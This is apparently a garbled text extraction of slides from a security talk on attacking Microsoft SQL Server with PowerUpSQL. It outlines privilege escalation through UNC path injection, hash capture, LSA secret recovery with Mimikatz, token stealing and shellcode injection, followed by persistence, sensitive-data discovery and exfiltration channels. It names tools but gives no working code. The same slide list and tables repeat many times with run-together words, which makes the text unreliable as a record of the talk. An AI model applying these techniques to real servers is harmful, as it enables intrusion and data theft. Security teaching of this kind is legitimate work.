password hash by default
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
But who really hasPUBLIC role access
Oh yeah a ton of domain users
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges DEMO
DEMOGet-SQLServiceAccountPwHashes
hellipwhat Itrsquos self descriptive
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges UNC Path Injection
DEMO
>
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
EscalatingPrivileges
OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges OS Admin to SysAdminTwo things to knowhellip
1 Different SQL Server versions can be abused in different ways2 All SQL Server versions provide the service account with sysadmin privileges
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges OS Admin to SysAdmin
Approach 2000 2005 2008 2012 2014 2016
LSA Secrets x x x x x x
Local Administrator x x
LocalSystem x x x
Process Migration x x x x x x
Token Stealing x x x x x X
Single User Mode x x x x x
Below are some options for leveraging that knowledge
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Escalating Privileges OS Admin to SysAdminHere are some tool options
Approach Common Tools
Access as Local Administrator Management Studio sqlcmd and other native SQL client tools
Access as LocalSystem Psexec accessibility options debugger with native SQL client tools
Recover SQL Server service account password from LSA Secrets
Mimikatz Metasploit lsadump
Inject shellcode or DLL into the SQL Server service process
Metasploit Empire Python Powershell C C++ (LoadLibraryCreateRemoteThread and similar functions)
Steal Authentication Token From SQL Server service process
Metasploit Incognito Invoke-TokenManipulation
Single User Mode DBATools
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Common Post Exploitation Activities
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)
Escalating Privileges SysAdmin to Service Account (2)
Escalating Privileges SysAdmin to Service Account (3)
Escalating Privileges Invoke-SQLOSCmd
Slide 68
Escalating Privileges Shared Service Accounts
Slide 70
Slide 71
Slide 72
Slide 73
Slide 74
Escalating Privileges Crawling Server Links
Slide 76
Slide 77
Slide 78
Slide 79
Escalating Privileges Crawling Server Links (2)
Escalating Privileges Crawling Server Links (3)
Escalating Privileges Crawling Server Links (4)
Escalating Privileges Database Links
Escalating Privileges Crawling Server Links (5)
Slide 85
Escalating Privileges UNC Path Injection
Escalating Privileges UNC Path Injection (2)
Escalating Privileges UNC Path Injection (3)
Escalating Privileges UNC Path Injection (4)
Escalating Privileges UNC Path Injection (5)
Escalating Privileges DEMO (4)
Escalating Privileges UNC Path Injection (6)
Slide 93
Escalating Privileges OS Admin to SysAdmin
Escalating Privileges OS Admin to SysAdmin (2)
Escalating Privileges OS Admin to SysAdmin (3)
Slide 97
Post Exploitation Overview
Post Exploitation Persistence
Post Exploitation Persistence (2)
Post Exploitation Finding Sensitive Data
Post Exploitation Finding Sensitive Data (2)
Post Exploitation Finding Sensitive Data (3)
Slide 104
General Recommendations
PowerUpSQL Overview Thanks
Speaker Information (2)
Post Exploitation OverviewCommon Post Exploitation Activities
1 Establish Persistencebull SQL Server Layer startup procedures agent jobs triggers modified codebull OS Layer Registry amp file auto runs tasks services etc
2 Identify Sensitive Databull Target large databasesbull Locate transparently encrypted databasesbull Search columns based on keywords and sample databull Use regular expressions and the Luhn formula against data samples
3 Exfiltrate Sensitive Databull All standard methods Copy database TCP ports UDP ports DNS
tunneling ICMP tunneling email HTTP shares links etc (No exfil in PowerUpSQL yet)